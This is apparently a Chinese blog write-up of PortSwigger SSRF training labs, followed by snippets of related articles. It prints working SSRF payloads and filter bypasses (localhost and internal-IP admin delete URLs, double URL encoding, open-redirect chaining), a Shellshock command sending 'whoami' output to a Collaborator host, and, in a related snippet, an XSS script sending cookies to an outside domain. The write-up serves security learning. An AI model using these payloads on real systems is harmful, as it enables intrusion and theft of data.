PortsWigger-SSRF

最新推荐文章于 2025-05-28 20:09:57 发布
最新推荐文章于 2025-05-28 20:09:57 发布
阅读量1k 收藏 24
点赞数 20
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74606212/article/details/136417951
版权

Lab: Basic SSRF against the local server

任务:

删除用户carlos 

在商品详情里可以看到:

 

 抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

 接下来我们根据提示

 

知道目标用户的url了

我们重复第一步

http://localhost/admin/delete?username=carlos

Lab: Basic SSRF against another back-end system

任务:

删除用户carlos

在商品详情里可以看到: 

 

 

url解码

http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1

根据提示我们开始爆破子网ip 

发现192.168.0.92

找到目标用户url地址

payload:

http://192.168.0.92:8080/admin/delete?username=carlos

完成

 

Lab: Blind SSRF with out-of-band detection

任务:

访问商品

抓包

发送至Repeater

启动Burp Collaborator客户端

点击"Copy to clipboard",并使Burp Collaborator客户端窗口保持打开状态。

更改Referer标头,将复制的Burp Collaborator域代替原始域 

然后我们返回到Burp Collaborator客户端窗口,然后单击“Poll now”。如果没有任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。

完成

Lab: SSRF with blacklist-based input filter

任务:

在商品详情里可以看到:

 

抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

接下来我们根据提示开始尝试

综上所述,127.0.0.1被禁用了,但是127.1可以绕过

接下来我们访问admin

发现admin也被禁用了

这里可以使用双url编码绕过

a的url编码是%61

所以双url编码为%2561

绕过成功 

 

获得目标用户url地址

payload:

http://127.1/%2561dmin/delete?username=carlos

 

完成

Lab: SSRF with filter bypass via open redirection vulnerability

任务:

在商品详情里可以找到:

抓包

url解码

%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
/product/stock/check?productId=1&storeId=1

 根据提示点击next product

发现path传参

接下来根据任务

 获得目标用户的url地址

payload:

/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

完成 

 Lab: Blind SSRF with Shellshock exploitation

任务:

这里需要安装拓展插件Collaborator Everywhere

接下来就是将实验室域添加到Burp Suite的目标范围,以便Collaborator Everywhere将其作为目标。

接下来当我们浏览网站时,就会扫描出存在ssrf的漏洞

分别是User-Agent和Referer

根据提示

() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN

 

复制橙色内容 

 

 完成

Lab: SSRF with whitelist-based input filter 

任务:

在商品详情里可以发现:

抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

将stockApi参数中的URL更改为

http://127.0.0.1/

 

说明127.0.0.1被禁用了

接下来我们将URL更改为 

http://username@stock.weliketoshop.net/

然后在username后添加一个#

我们可以使用上面使用过的方法,将#双url编码%2523

将username改为localhost,并加上admin

 获得目标用户的url地址

payload:

http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

完成

 

orzw
关注
Portwigge的Web安全漏洞训练平台SSRF通关
st3pby的博客
11-16 2002
Portwigge的Web安全漏洞训练平台SSRF通关
portswigger靶场SSRF通关
m0_49197645的博客
10-19 1000
一、针对本地服务器的基本 SSRF一、针对本地服务器的基本 SSRF1、实验要求:该实验室具有库存检查功能,可以从内部系统获取数据。要解决该实验,请更改库存检查 URL 以访问管理界面,并删除用户carlos。2、实验步骤a、根据提示可以更改库存检查 URL 发现一个参数stockApib、将上述请求包发送重放器直接将参数更改为stockApi=http%3a%2f%2flocalhost%2fadmin后发送请求,发现响应成功。
SSRF学习
bianxia123456的博客
02-23 469
SSRF
Lab: Basic SSRF against the local server 实验:简单的SSRF本地服务器攻击
jamesP777的博客
05-11 286
通过修改stopApi实现简单的SSRF对服务器攻击,获取管理员界面,从而进行敏感操作。
PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1481
文章目录总结什么是SSRFSSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
ssrf-lab:探索SSRF漏洞的实验室
05-22
实验室 探索SSRF漏洞的实验室 10月4日的实验室位于/ ctf目录中:-)
SSRF(一):PortSwigger靶场笔记
aaaadoga的博客
07-14 1033
该文章是关于作者在PortSwiggerSSRF靶场训练的记录和学习笔记
SSRF漏洞解析
apple_52721339的博客
04-23 439
SSRFServer-Side Request Forgery,服务端请求伪造)是指攻击者向服务端发送包含恶意 URL 链接的请求,借由服务端去访问此 URL ,以获取受保护网络内的资源的一种安全漏洞。SSRF 常被用于探测攻击者无法访问到的网络区域,比如服务器所在的内网,或是受防火墙访问限制的主机。 ​ SSRF 漏洞的产生,主要是因为在服务端的 Web 应用,需要从其他服务器拉取数据资源,比如图片、视频、文件的上传/下载、业务数据处理结果,但其请求地址可被外部用户控制。 ​ 请求地址被恶意利用的话,如
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1080
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
【BurpSuite】SSRF | Server-side request forgery (1-5)
m0_71944965的博客
09-10 1113
进入靶场发现是一个登录页面 用admin试试发现登录失败 按靶场提示去检查商品库存并抓包找到url将URL更改为访问管理界面 更改url后将抓包发送到 在Response中找到部分 将delete语句放到url中再放行 回到靶场,下图右上角变为即为成功 访问一个产品,点击“检查库存”,在Burp Suite中拦截请求,并发送给Burp Intruder 清除§ 将将 stockApi 更改为http://192.168.0.1:8080/admin 给数字1增加§:点击Add§ 对ip进行爆破:Pay
SSRF attacks against other back-end systems SSRF攻击其他后端系统
jamesP777的博客
05-11 359
有时候,应用服务器可以和用户连接不到的其他后端系统直接连接。这些后端系统通常是使用的私有IP地址。由于这些后端系统被网络拓扑结构保护起来了,所以安全性不高。多数的内部后端系统允许能够连接到他们的用户不经授权直接接入从而执行一些敏感操作。在上一个实验中,如果有个管理员接口在后端地址:https://192.168.0.68/admin,攻击者同样可以修改stocApi进行SSRF漏洞攻击。
网络安全SSRF+XXE漏洞挖掘笔记
kali_Ma的博客
10-23 1738
声明 本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果 一、Server-side request forgery (SSRF) 01、Basic SSRF against the local server 描述 该实验室具有库存检查功能,可从内部系统获取数据。 为了解决实验室,更改股票检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。 解决方案 1.浏览/admin并观察您无法直接访问管理页面。 2.访问一个产
ssrf-lab踩坑记录
qq_39670065的博客
09-03 657
详细安装见Centos7下安装Docker(详细安装教程) 可以配置镜像加速器,在阿里云找docker节点 解决办法Linux -bash: git: 未找到命令的解决方法
ssrf-lab详解看ssrf
hxhxhxhxx的博客
12-26 2712
ssrf-lab详解basicadvanced1 前言:首先需要下载ssrf-lab https://github.com/m6a-UdS/ssrf-lab 然后,使用docker搭建服务 docker-compose up -d 静默开启服务 这个是有compose.yml存在时候,在同级目录下使用 停止 docker-compose stop 清除 docker-compose kill 如果没有的话, 直接./Makefile执行文件即可 我们查看我们的镜像,然后进行run basic ad
网络安全】——Modbus协议详解:工业通信的“通用语言”
最新发布
lingxw的博客
05-28 782
本文系统介绍了Modbus工业通信协议的技术要点。从发展历史(1979年由Modicon公司推出)到核心特性(主从模式、四类存储区),详细解析了协议族分类(RTU/ASCII/TCP/Secure)及版本演进。重点剖析了RTU/TCP报文结构,并通过典型示例说明通信机制(功能码、时序流程)。文章还提供了开发工具推荐(ModbusPoll、libmodbus等)和学习路径。作为工业通信领域的事实标准,Modbus凭借其简单可靠的特性在工业4.0时代仍保持活力,并持续演进新形态(如Modbus over TSN
2025年北京市职工职业技能大赛第六届信息通信行业网络安全技能大赛复赛CTF部分WP-哥斯拉流量分析
深耕网络安全领域,聚焦护网行动(HW)、渗透测试、等级保护(等保)、CTF 竞赛四大核心方向,提供技术干货、实战经验与行业洞察。
05-28 730
题目没有任何提示,附件gzl.pcap解题哥斯拉流量300多KB包很多,没啥经验只能挨个看回来之后又狠狠得撸了一把哥斯拉流量分析我这里用的是哥斯拉4.0.1测试链接这里发了两个包,我们进行分析。
网络安全--PHP第二天
2301_81140745的博客
05-25 1056
input type="text" name="username" id="username" class="form-control" placeholder="请输入用户名"><input type="text" name="username" id="username" class="form-control" placeholder="请输入用户名">//写cookie 有了后不需要密码就可以登录。
网络安全给数据工厂带来的挑战
长期专注于数字工厂规划、建设。对数字化、智能制造、自动化控制等领域有深刻的体会、感触
05-24 1059
网络威胁正日益加剧,网络攻击日复一日,屡见不鲜。随着攻击者不断企图削弱你的防御等级,他们运用精心构建好的入侵杀伤链和多变的估计策略,以及量身定制的技术、技术和程序,企图破坏你的业务运营或危害你的客户利益,为了构建坚实的防护和不断提高安全意识,网络安全对我们提出了新的要求和挑战。
五、web安全--XSS漏洞(1)--XSS漏洞利用全过程
bronze_s的博客
05-28 892
XSS漏洞利用与攻击平台分析 XSS攻击流程包括:1) 寻找注入点(如未过滤的搜索框、评论区);2) 构造恶意脚本(反射型、存储型、DOM型);3) 触发攻击(通过URL、存储内容或DOM修改);4) 数据窃取(Cookie、敏感信息)或执行恶意操作(钓鱼、CSRF)。XSS平台(如XSS Hunter)提供Payload生成、数据接收和远程控制功能,支持盲打XSS、CSRF结合及WAF绕过技术。典型攻击链:注入Payload→触发执行→平台收集数据→发起进一步攻击(会话劫持、键盘记录)。防御需加强输入过滤
ssrf靶场
03-19
### 关于 SSRF 漏洞练习的靶场和学习资料 #### 官方推荐的 Web 安全漏洞测试平台 对于 SSRFServer-Side Request Forgery)漏洞的学习,可以尝试使用 Pikachu 平台进行实践操作。这是一个由官方提供的、专注于 Web 安全漏洞测试的开源项目[^1]。 #### 实际案例中的 Payload 设计 在实际环境中,SSRF 的利用通常涉及绕过输入过滤器来访问内部服务或接口。例如,在某实验场景下,可以通过构造如下 payload 来实现对目标系统的 SSRF 攻击: ```plaintext stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos ``` 此 payload 利用了 URL 编码技巧 `%2523` 替代 `#` 字符,从而成功绕过了基于白名单的输入过滤机制[^2]。 #### CSRF 和 XSS 结合的应用场景分析 除了 SSRF 外,CSRF(跨站请求伪造)也是常见的攻击手段之一。通过获取目标网站生成的 CSRF 令牌并诱导用户点击恶意链接,攻击者能够执行未经授权的操作[^3]。而在某些情况下,为了进一步提升攻击效果,还可以结合存储型 XSS 功能完成更复杂的攻击链路设计。比如以下脚本可用于窃取用户的 Cookie 数据: ```javascript <script>document.location='//xxxxxxxxxxxxxxxx.web-security-academy.net/'+document.cookie</script> ``` 该代码片段展示了如何利用 XSS 注入技术捕获受害者的敏感信息,并将其发送至攻击者控制的服务端地址上[^4]。 #### 推荐的学习资源与在线实验室 针对希望深入研究 SSRF 及其他网络安全领域知识的人群来说,可以从以下几个方面入手查找合适的教育材料或者模拟环境来进行训练: - **Pikachu**: 如前所述,它是一个综合性的渗透测试演练工具集,涵盖了多种类型的常见漏洞类型。 - **PortSwigger Web Security Academy**: 提供了一系列高质量的教学课程以及互动式的虚拟机实例用于实操体验各种网络威胁防护措施的有效性和局限性。 - **Hack The Box / TryHackMe**: 这些平台上也有专门面向初学者到高级玩家的不同难度级别的房间可供挑战,其中就包含了关于服务器端请求伪造等相关主题的内容讲解和技术分享文章。 综上所述,无论是理论基础还是动手能力培养都非常重要的前提条件下,合理选用上述提到的各种公开可用资源将会极大地促进个人技能水平的进步与发展!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值